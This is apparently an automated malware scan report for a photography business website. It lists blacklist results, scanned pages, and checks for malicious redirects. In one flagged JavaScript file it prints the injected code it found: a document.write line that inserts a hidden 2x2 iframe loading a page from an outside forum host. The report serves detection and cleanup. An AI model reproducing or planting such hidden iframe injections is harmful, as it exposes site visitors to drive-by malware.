Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=twcphotography.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://twcphotography.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://twcphotography.com/ | 200 OK Content-Length: 3236 Content-Type: text/html | clean |
http://twcphotography.com/index.html | 200 OK Content-Length: 3236 Content-Type: text/html | clean |
http://twcphotography.com/ABOUT.html | 200 OK Content-Length: 3348 Content-Type: text/html | clean |
http://twcphotography.com/GALLERIES.html | 200 OK Content-Length: 6215 Content-Type: text/html | clean |
http://twcphotography.com/PACKAGES.html | 200 OK Content-Length: 4234 Content-Type: text/html | clean |
http://twcphotography.com/CONTACT.html | 200 OK Content-Length: 3642 Content-Type: text/html | clean |
http://twcphotography.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://twcphotography.com/Price List.pdf | 200 OK Content-Length: 300970 Content-Type: application/pdf | clean |
http://twcphotography.com/WEDDINGS.html | 200 OK Content-Length: 4578 Content-Type: text/html | clean |
http://twcphotography.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 21861 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://forums.smartlanka.net/eems.html?j=1198854></iframe>');
var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", win var obj = getElementById(EXPRESS_INSTALL_ID); if (obj) { obj.parentNode.replaceChild(storedAltContent, obj); if (storedAltContentId) { setVisibility(storedAltContentId, true); if (ua.ie && ua.win) { storedAltContent.style.display = "block"; } } storedAltContent = null; storedAltContentId = null; isExpressInstallActive = false; } } } }; }();
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://forums.smartlanka.net/eems.html?j=1198854
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://forums.smartlanka.net/eems.html?j=1198854>
http://twcphotography.com/INDEX.html | 404 Not Found Content-Length: 327 Content-Type: text/html | clean |
http://twcphotography.com/BRIDALS.html | 200 OK Content-Length: 3421 Content-Type: text/html | clean |
http://twcphotography.com/ENGAGEMENTS.html | 200 OK Content-Length: 4688 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: twcphotography.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 16:03:30 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 3236
Content-Type: text/html
Last-Modified: Sun, 08 Dec 2013 20:43:26 GMT
...3236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: twcphotography.com
Referer: http://www.google.com/search?q=twcphotography.com
Result:
The result is similar to the first query. There are no suspicious redirects found.